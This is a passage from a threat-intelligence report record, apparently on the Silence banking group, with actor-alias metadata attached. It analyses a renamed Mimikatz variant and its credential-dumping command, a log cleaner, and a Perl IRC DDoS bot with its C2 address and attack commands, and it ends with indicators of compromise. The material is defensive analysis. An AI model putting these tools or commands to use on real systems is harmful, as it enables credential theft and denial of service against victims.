information on cassette status | Yes | Yes\r\nDetermining dispenser and PIN pad status before operation (codes 301 and 401) | Yes | No\r\nSearching for hService handles when calling WFSGetInfo | Yes | No\r\nFunctions available to read the keys entered on the PIN pad | Yes | No\r\nTransmitting commands through files with extension | *.cmd | *.c\r\nRandom data generation based on | CryptAcquireContextA + CryptGenRandom | rand()\r\nWriting return code to file | Yes, to file with extension *.007 | No\r\nA command to modify the command counter of the current app’s random flow | Yes, command #5 | No\r\nCommand to pause Trojan operation | No | Yes\r\nOTHER PROGRAMS\r\nUtilities\r\nFarse\r\nFile name | MD5 hash | Program type\r\nm32.exe | 40228a3ea22e61a0f53644881cd59281 | Mimikatz\r\nThis file is a modified version of the well-known utility Mimikatz that extracts clear text credentials and hashes from memory. Mimikatz source code is available on the developer’s page hххps://github[.]com/gentilkiwi/mimikatz. Analysis of this file suggests that it is based on Mimikatz source code, with some new functions added to the file.\r\nWe compared it to Mimikatz 2.1.1 x86, the latest available version at the time of writing this report. The file was found to contain artifacts that suggest that the build had been based on source code of earlier versions (\u003c 2.1.1). Information in the header of the executable file suggests that it was compiled on 19.09.2009 at 07:39:40 GMT.\r\n• A binary comparison of this file with the original mimikatz exe, version 2.1.1 x86, using the utility BinDiff, demonstrates that the binary similarity between them is 25% and that this file has 91% of the Mimikatz file functions.\r\n• The screenshot above shows the launch of this file for a random (knowingly non-existent) command; the one below shows the launch of the original Mimikatz.\r\n• Both apps responded identically to this argument in the command line, showing a list of supported commands.\r\nHow Farse is different from the original Mimikatz source code\r\n1. Banners and all mentions of \"mimikatz\" in the product are obliterated to the maximum extent (although the developer could not do it everywhere). 
The purpose of this is obviously to hide this file from antivirus scanners.\r\n2. Some words – User, Domain, Password – are changed to U, D, P.\r\n3. Command names are different. The original command to extract OS passwords, \"sekurlsa::logonpasswords\", is renamed as \"sss::logonpasswords\".\r\n4. Farse does not require the additional command \"mimikatz # privilege::debug\", unlike the original mimikatz. It automatically retrieves a debug privilege token to be able to extract data from the system process.\r\n5. This file automatically writes its results in the text file \"Farse.log\" in the current directory. As an example, when the executable file is run with the argument \"sss::logonpasswords\", the extracted passwords and hashes will be saved to this log file.\r\n6. User and system credentials are retrieved through the use of the function \"sss::logonpasswords\" (in the original Mimikatz source code the function is called \"sekurlsa::logonpasswords\"). This function retrieves credentials from the lsass.exe system process (Local Security Authority Subsystem Service).\r\nCleaner\r\nFile name | MD5 hash | Program type\r\ncleaner.exe | 8A9D278B473B6C5625D57739714702FC | RAdmin log cleaner\r\nThis file is designed to write garbage to the log file of RAdmin server connections deployed on the victim machine and to delete that file afterwards. Due to a programmer’s error, garbage is written not to the beginning of the file, but to its end, which makes it possible to retrieve the original log. The program was compiled on 08.10.2017 at 07:46:09.\r\nWhen run, the program generates random values whose length is between the size of the file C:\\Windows\\System32\\rserver30\\Radm_log.htm + 10 and that size + 1024:\r\nIt then writes them to the end of the file and deletes the file. Presumably, the programmer’s intention was to have these random values written to the beginning of the file so as to obstruct restoration of RAdmin connection logs. An implementation error, however, prevents this from happening:\r\nThe argument FILE_END is thereby passed on to the function SetFilePointer, which means that the write pointer is set to the end of the file.\r\nPerl IRC DDoS bot\r\nThis bot is a Perl script designed to run on Linux OS. Its functionality includes retrieving information about the infected machine, executing shell commands (cmd), sending emails, downloading files, scanning ports and carrying out DDoS attacks. The server involved is 91.134.146[.]175:1984, communication protocol IRC, channel name \"#PMA\".\r\nFirst of all, the script displays the message \"Irc Script Running!\\n\", after which the bot randomly selects its own version from among the following lines:\r\n\"VERSION — unknown command.\"\r\n\"mIRC v5.91 K.Mardam-Bey\"\r\n\"mIRC v6.2 Khaled Mardam-Bey\"\r\n\"mIRC v6.03 Khaled Mardam-Bey\"\r\n\"mIRC v6.14 Khaled Mardam-Bey\"\r\n\"mIRC v6.15 Khaled Mardam-Bey\"\r\n\"mIRC v6.16 Khaled Mardam-Bey\"\r\n\"mIRC v6.17 Khaled Mardam-Bey\"\r\n\"mIRC v6.21 Khaled Mardam-Bey\"\r\n\"mIRC v6.31 Khaled Mardam-Bey\"\r\n\"mIRC v7.15 Khaled Mardam-Bey\"\r\nIt uses IRC server 91.134.146[.]175 and port 1984. The server can be changed by passing the script an address as a parameter at the time of running the script. After connection and authorization on the server, the script can receive commands from and send execution results to the operator using its nickname. On receiving a command, the script checks if the message belongs to a particular instance (checking is done against internal script parameters) and then parses and executes the following commands:\r\n• PPING – receives a string as a parameter which it then sends out as PONG \u003c%string%\u003e\r\n• PRIVMSG – contains a list of advanced commands. The command is executed only after the script has checked a command for affiliation. For that purpose, the server sends out (as parameters) the name of the infected system, the user name on the infected system and the values specific to a particular version of the script.\r\n• NICK – changes the current script nickname (used during a check if a command is associated with a specific script instance).\r\n• 433 – the bot sends a message to the server: \"\u003c%current nick%\u003e-\u003c%random value from 0 to 999%\u003e\".\r\n• 001 – join the channel and send the message \"[PMA Bot]9,1I’m PMA!\" to the channel\r\nA list of extended commands:\r\nCommand | Description\r\nVERSION | Send the current version of the bot to the server.\r\nhelp | Brief bot manual\r\nsystem | Retrieve information about the current bot instance\r\nversion | Receive a bot version\r\nflood | Bot manual for DDoS commands\r\nchannel | Manual for general bot commands\r\nutils | Bot manual for apps\r\ndie | Terminate bot operation\r\njoin | Join the channel received as a parameter\r\npart | Leave the channel received as a parameter\r\nportscan | Get a list of open TCP ports on the device whose IP address is received as a parameter.\r\ndownload | Download and save a file\r\ndns | Send to the server the IP address of the hostname received as a parameter.\r\nport | Check if the TCP port is open on a specific device. 
IP and port are received as parameters.\r\nudp1 | Launch a UDP flood attack, packet length 64 to 1024 bytes (small packets). The address, port, and attack duration are received as parameters.\r\nudp2 | Launch a DDoS attack using all network protocols, primarily IGMP, UDP, ICMP and TCP. Attacks all ports starting from 1 up to the last one while the time set as a parameter is running. Received as parameters: the address of the victim, the length of the message sent, and the duration of the attack. Each UDP port is attacked twice.\r\nudp3 | Launch a UDP DDoS attack using long packets, receiving the address, the port, and the duration of the attack as parameters.\r\ntcp | Launch a TCP DDoS attack. Opens 1,000 connections on a specific port. The address, port, and the duration of the attack are received as parameters. This command’s manual indicates that 4 parameters must be transmitted in the sequence \"\u003cip \u003e \u003cport \u003e \u003cpack size \u003e \u003ctime\u003e\"; this, however, is an error as the parameter \"\u003cpack size\u003e\" is missing altogether: the script does not send any messages to the victim.\r\nhttp | Launch an HTTP DDoS attack. Parameters received include the address of the victim and the duration of the attack. The application sends a message of the following type to the victim’s address: \"GET / Http/1.1\\r\\nAccept: */*\\r\\nHost: \u003c%Victim URL%\u003e\\r\\nConnection: Keep-Alive\\r\\n\\r\\n\".\r\ncback | Open a TCP connection with a remote host to execute shell commands (or cmd commands in the case of Windows).\r\nmail | Send a message. The body of the message:\r\ncontent-type: text/html\r\nSubject: \u003c%first parameter%\u003e\r\nFrom: \u003c%second parameter%\u003e\r\nTo: \u003c%third parameter%\u003e\r\n\u003c%fourth parameter%\u003e\r\nTo send the message, it uses the utility \"/usr/sbin/sendmail\" with the parameter –t.\r\nctcpflood (version with one parameter) | The bot sends the user with the nickname (the first parameter) the following messages 10 times:\r\n\"\\001VERSION\\001\\n\"\r\n\"\\001PING\\001\\n\"\r\nmsgflood | Sends the user (whose name it receives as a parameter) a message with non-printable characters.\r\nnoticeflood | Similar to the \"msgflood\" command, but another IRC command is used for transmission.\r\nmaxiflood | Carries out the attacks launched in ctcpflood, msgflood and noticeflood 5 times.\r\nrejoin | Reconnect to the channel.\r\nop | Add operator status by nickname. Status and nickname are received as parameters.\r\ndeop | Delete operator status by nickname. Status and nickname are received as parameters.\r\nvoice | Add voice status by nickname. Status and nickname are received as parameters.\r\ndevoice | Delete voice status by nickname. Status and nickname are received as parameters.\r\nmsg | Send a message (the second parameter) to the user whose nickname is received as the first parameter.\r\nflood | Send messages (the third parameter) to the user whose nickname is received as the second parameter. Number of messages: the first parameter.\r\nctcp | The bot sends the user with the nickname given as the first parameter the following message: \"\\001\u003c%param2%\u003e\\001\".\r\nctcpflood (version with two parameters) | The bot sends the user with the nickname given as the second parameter the following messages: \"\\001\u003c%param3%\u003e\\001\". The number of messages is received as a parameter.\r\ninvite | Invite the user to the channel. 
The user and channel are received as parameters.\r\nnewerver | Change the IRC server. The new nickname and address are received as parameters; standard port 6667.\r\nnick | Change the nickname. The new nickname is received as a parameter.\r\nraw | Sends to the server a message that is received as a parameter.\r\neval | Run a module that is received as a parameter.\r\nquit | Terminate app operation\r\nA list of scanned TCP ports:\r\nINDICATORS\r\nHashes\r\nE-mails\r\nIPs\r\nDomains\r\nFile system artifacts\r\nDirectories\r\n• c:\\1\r\n• c:\\intel\r\n• c:\\atm\r\nFiles:\r\n• C:\\Users\\\u003c%username%\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WINWORD.exe\r\n• C:\\ProgramData\\IntelSofts_\u003chex value\u003e.exe\r\n• C:\\ProgramData\\MicrosoftsUpdte.exe\r\n• C:/Windows/temp/OBDP952.tmp.exe\r\n• apcs.exe\r\n• netsrvc32.exe\r\n• smmsrv.exe\r\n• MicrosoftsUpdte_\u003chex value\u003e.exe\r\n• Intel Security.exe\r\n• pripr.exe",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://go.group-ib.com/report-silence-en?_gl=1*d1bh3a*_ga*MTIwMzM5Mzc5MS4xNjk4OTI5NzY4*_ga_QMES53K3Y2*MTcwNDcyMjU2OS40LjEuMTcwNDcyMzU1Mi41My4wLjA."
	],
	"report_names": [
		"report-silence-en?_gl=1*d1bh3a*_ga*MTIwMzM5Mzc5MS4xNjk4OTI5NzY4*_ga_QMES53K3Y2*MTcwNDcyMjU2OS40LjEuMTcwNDcyMzU1Mi41My4wLjA."
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-29T10:39:54.681518Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c9617bb6-45c8-495e-9759-2177e61a8e91",
			"created_at": "2022-10-25T15:50:23.405039Z",
			"updated_at": "2026-04-29T10:39:54.841601Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Carbanak",
				"Anunak"
			],
			"source_name": "MITRE:Carbanak",
			"tools": [
				"Carbanak",
				"Mimikatz",
				"PsExec",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a58aedbc-e89f-4e0c-8147-c6406a616cfa",
			"created_at": "2022-10-25T16:07:23.494355Z",
			"updated_at": "2026-04-29T10:39:55.236385Z",
			"deleted_at": null,
			"main_name": "Corkow",
			"aliases": [
				"Corkow",
				"Metel"
			],
			"source_name": "ETDA:Corkow",
			"tools": [
				"Corkow",
				"Metel"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "746214d4-5d48-4644-b763-8e9a9c549c04",
			"created_at": "2022-10-25T16:07:23.878029Z",
			"updated_at": "2026-04-29T10:39:55.375826Z",
			"deleted_at": null,
			"main_name": "MoneyTaker",
			"aliases": [],
			"source_name": "ETDA:MoneyTaker",
			"tools": [
				"Kronos",
				"Metasploit",
				"MoneyTaker",
				"Screenshotter"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-29T10:39:54.783938Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "01d569b1-f089-4a8f-8396-85078b93da26",
			"created_at": "2023-01-06T13:46:38.411615Z",
			"updated_at": "2026-04-29T10:39:53.06001Z",
			"deleted_at": null,
			"main_name": "BuhTrap",
			"aliases": [],
			"source_name": "MISPGALAXY:BuhTrap",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3b046db2-f60e-49ae-8e16-0cf82a4be6fb",
			"created_at": "2022-10-25T16:07:23.427162Z",
			"updated_at": "2026-04-29T10:39:55.209295Z",
			"deleted_at": null,
			"main_name": "Buhtrap",
			"aliases": [
				"Buhtrap",
				"Operation TwoBee",
				"Ratopak Spider",
				"UAC-0008"
			],
			"source_name": "ETDA:Buhtrap",
			"tools": [
				"AmmyyRAT",
				"Buhtrap",
				"CottonCastle",
				"FlawedAmmyy",
				"NSIS",
				"Niteris EK",
				"Nullsoft Scriptable Install System",
				"Ratopak"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e8ebcbda-e8df-4a38-a2a6-63b2608ee6f3",
			"created_at": "2023-01-06T13:46:38.88051Z",
			"updated_at": "2026-04-29T10:39:53.191507Z",
			"deleted_at": null,
			"main_name": "Silence group",
			"aliases": [
				"WHISPER SPIDER"
			],
			"source_name": "MISPGALAXY:Silence group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf",
			"created_at": "2023-01-06T13:46:38.405479Z",
			"updated_at": "2026-04-29T10:39:53.057916Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"Carbon Spider",
				"CARBON SPIDER",
				"ATK32",
				"Coreid",
				"JokerStash",
				"GOLD NIAGARA",
				"G0046",
				"G0008",
				"Carbanak",
				"Sangria Tempest",
				"ELBRUS"
			],
			"source_name": "MISPGALAXY:FIN7",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ed3810b7-141a-4ed0-8a01-6a972b80458d",
			"created_at": "2022-10-25T16:07:23.443259Z",
			"updated_at": "2026-04-29T10:39:55.215377Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider",
				"ELBRUS",
				"G0008",
				"Gold Waterfall",
				"Sangria Tempest"
			],
			"source_name": "ETDA:Carbanak",
			"tools": [
				"AVE_MARIA",
				"Agentemis",
				"AmmyyRAT",
				"Antak",
				"Anunak",
				"Ave Maria",
				"AveMariaRAT",
				"BABYMETAL",
				"BIRDDOG",
				"Backdoor Batel",
				"Batel",
				"Bateleur",
				"BlackMatter",
				"Boostwrite",
				"Cain \u0026 Abel",
				"Carbanak",
				"Cl0p",
				"Cobalt Strike",
				"CobaltStrike",
				"DNSMessenger",
				"DNSRat",
				"DNSbot",
				"DRIFTPIN",
				"DarkSide",
				"FOXGRABBER",
				"FlawedAmmyy",
				"HALFBAKED",
				"JS Flash",
				"KLRD",
				"MBR Eraser",
				"Mimikatz",
				"Nadrac",
				"Odinaff",
				"POWERPIPE",
				"POWERSOURCE",
				"PsExec",
				"SQLRAT",
				"Sekur",
				"Sekur RAT",
				"SocksBot",
				"SoftPerfect Network Scanner",
				"Spy.Agent.ORM",
				"TEXTMATE",
				"TeamViewer",
				"TiniMet",
				"TinyMet",
				"Toshliph",
				"VB Flash",
				"WARPRISM",
				"avemaria",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-29T10:39:54.613086Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-29T10:39:54.831475Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e5364c16-eb97-467e-a8c2-a720269498c1",
			"created_at": "2023-01-06T13:46:38.733469Z",
			"updated_at": "2026-04-29T10:39:53.152419Z",
			"deleted_at": null,
			"main_name": "MoneyTaker",
			"aliases": [],
			"source_name": "MISPGALAXY:MoneyTaker",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-29T10:39:53.053551Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"FANCY BEAR",
				"ITG05",
				"T-APT-12",
				"UAC-0001",
				"Fancy Bear",
				"STRONTIUM",
				"Group 74",
				"G0007",
				"Fighting Ursa",
				"Blue Athena",
				"FROZENLAKE",
				"Forest Blizzard",
				"GruesomeLarch",
				"Pawn Storm",
				"Sednit",
				"SNAKEMACKEREL",
				"TG-4127",
				"SIG40",
				"ATK5",
				"APT-C-20",
				"Sofacy",
				"Tsar Team",
				"IRON TWILIGHT",
				"Grizzly Steppe",
				"TA422",
				"UAC-0028",
				"BlueDelta"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-29T10:39:55.519335Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-29T10:39:54.568619Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-29T10:39:54.685688Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"LAMEHUG",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-29T10:39:55.531334Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1777450926,
	"ts_updated_at": 1777459312,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/600cac4b4fc9a9b6241a9177429d5ea474950633.pdf",
		"text": "https://archive.orkl.eu/600cac4b4fc9a9b6241a9177429d5ea474950633.txt",
		"img": "https://archive.orkl.eu/600cac4b4fc9a9b6241a9177429d5ea474950633.jpg"
	}
}